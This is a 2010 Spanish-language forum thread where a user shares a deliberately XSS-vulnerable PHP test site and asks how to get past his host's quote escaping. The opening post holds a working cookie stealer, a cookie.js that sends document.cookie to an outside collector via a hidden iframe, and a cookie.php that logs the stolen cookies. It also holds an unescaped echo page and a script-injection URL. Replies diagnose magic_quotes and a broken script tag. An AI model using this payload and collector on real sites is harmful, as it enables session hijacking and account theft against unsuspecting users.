Problema con añadimiento en codigo

Iniciado por Dr [F], 29 Julio 2010, 04:42 AM

0 Miembros y 2 Visitantes están viendo este tema.

Imprimir
Ir Abajo Páginas1 2
Acciones del Usuario

Dr [F]

29 Julio 2010, 04:42 AM
Hola gente miren estaba montando un servidor de pruebas y lo subi a mi@

los codigos son los siguientes:

webv.php

Código [Seleccionar]
<?php
session_start();
?>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>Bienvenidos a XSS testing</title>
</head>
   
<body><center>
<h1><font color=red>XSS Testing</font></h1></center>
<div align=center>
<form method="post" action="busca.php" >
<input type="text" name="busca" value="Buscador Vulnerable" maxlength="222">
<input type="submit" value="buscar">
</form>
</div>
<br><br><br>
<form method="post" action="pag2.php">
<font color=red>Ingrese su usuario:    <input type="text" name="nombre">
<br>
Ingrese su contraseña: </font><input type="password" name="password">
<br>
<input type="submit" value="enviar">
</form>
</body>
</html>

busca.php

Código [Seleccionar]
<?php
$bus $_REQUEST['busca'];

echo ($bus);
?>

pag2.php

Código [Seleccionar]
<?php
$user=$_POST['nombre'];
$pass $_POST['password'];
if ($user == "franco"  && $pass == "franco")
{
setcookie("senia"$user."-"$passtime()+60*60*24*365"/");
echo "Bienvenido $user";
}
else
{
echo "usuario o contraseña incorrcto:";
}
?>

cookie.js

Código [Seleccionar]
document.write("<iframe width='0' height='0' src='http://www.pruebas18p.webcindario.com/cookie.php?c="+document.cookie+"'></iframe>");

cookie.php

Código [Seleccionar]
<?php
$cookie=$_GET['c'];
$file=fopen('archivo.txt''a');
fwrite($file$cookie.' - ');
fclose($file);
?>


esta es la url vulnerable a nivel localhost:

http://localhost/busca.php?busca=<script src="http://localhost/cookie.js"</script>

El codigo que interpretaria busca.php seria <script src="Http://localhost/cookie.js"</script>

pero mi@ es el siguiente

Código [Seleccionar]
<script src=\"http://www.pruebas18p.webcindario.com/cookie.js\"</script>
<!-- Inserted by miarroba -->
<script type="text/javascript" src="http://weborama.miarroba.info/?d=hosting&amp;h=pruebas18p.webcindario.com&amp;t=1280371273&amp;k=5c4e108c6ef14544954ee758c7790aa0"></script>
<!-- Inserted by miarroba -->




Bueno a nivel localhost no hay problema, puedo obtener tranquilamente las cookies, pero en mi arroba no se puede ejecutar el script

alguien sabe alguna forma de bypassear ese filtro que tiene mi arroba ?

gracias :)


"Una vulnerabilidad es tan limitada como tu quieres que lo sea"

[H] Risk T --> Dr [F]

Ari Slash

#1
29 Julio 2010, 04:55 AM
no se que filtro ni nada xD

pero prueba en este hosting www.zymic.com
para pruebas si que es bueno


saludos

Dr [F]

#2
29 Julio 2010, 06:20 AM
no pasa por que el hosting sea malo, solo tiene un pequeño filtro que quiero saber como evadirlo :)

igual gracias por la respuesta :)
"Una vulnerabilidad es tan limitada como tu quieres que lo sea"

[H] Risk T --> Dr [F]

Shell Root

#3
29 Julio 2010, 18:19 PM
Código (javascript) [Seleccionar]
<script src=\"http://www.pruebas18p.webcindario.com/cookie.js\"</script>
No entiendo el porque escapas las comillas dobles. No debería ser así: (Además de cerrar bien la etiqueta <script>)
Código (javascript) [Seleccionar]
<script src="http://www.pruebas18p.webcindario.com/cookie.js"></script>
Por eso no duermo, por si tras mi ventana hay un cuervo. Cuelgo de hilos sueltos sabiendo que hay veneno en el aire.

Dr [F]

#4
30 Julio 2010, 00:43 AM
disculpa Shell, pero no entiendo en la parte que dices que escapo de las comillas dobles  :-[.

Podrias expresarte mejor ?

Muchas gracias
"Una vulnerabilidad es tan limitada como tu quieres que lo sea"

[H] Risk T --> Dr [F]

Erfiug

#5
30 Julio 2010, 01:39 AM
si pones un backslash delante de las comillas es para indicar que quieres mostrar ese carácter (las comillas) y no para delimitar un string.

Dr [F]

#6
31 Julio 2010, 23:57 PM
creo que no me entendieron -.-
Código [Seleccionar]

<script src=\"http://www.pruebas18p.webcindario.com/cookie.js\"></script>

ese codigo lo añade mi arroba, yo pongo este:

Código [Seleccionar]
http://www.pruebas18p/busca.php?busca=<script src="http://www.pruebas18p/cookie.js"</script>

yo no añado los backslashes, los añade mi arroba

PD: Shell root, la etiqueta no esta mal cerrada, funciona de las dos maneras
"Una vulnerabilidad es tan limitada como tu quieres que lo sea"

[H] Risk T --> Dr [F]

~ Yoya ~

#7
1 Agosto 2010, 02:12 AM
Pasa que al parecer tienes la directiva magic_quotes_gpc(GET, POST, COOKIE) ON del php.ini, que escapa las comillas simples y dobles con barras invertidas...

Info:
http://foro.undersecurity.net/read.php?15,6470
Mi madre me dijo que estoy destinado a ser pobre toda la vida.
Engineering is the art of balancing the benefits and drawbacks of any approach.

Shell Root

#8
1 Agosto 2010, 02:13 AM
Cita de: frankitox en 31 Julio 2010, 23:57 PM
Código [Seleccionar]
http://www.pruebas18p/busca.php?busca=<script src="http://www.pruebas18p/cookie.js"</script>
Analiza ese código y comparalo con este ejemplo.
Código [Seleccionar]
<bHola</b>
Está bien cerrada la etiqueta?
Por eso no duermo, por si tras mi ventana hay un cuervo. Cuelgo de hilos sueltos sabiendo que hay veneno en el aire.

Dr [F]

#9
1 Agosto 2010, 04:32 AM
miren, hagan de cuenta como que no dije nada.. dale ?
jaja muchas gracias
perdon  :-[
"Una vulnerabilidad es tan limitada como tu quieres que lo sea"

[H] Risk T --> Dr [F]
Imprimir
Ir Arriba Páginas1 2
Acciones del Usuario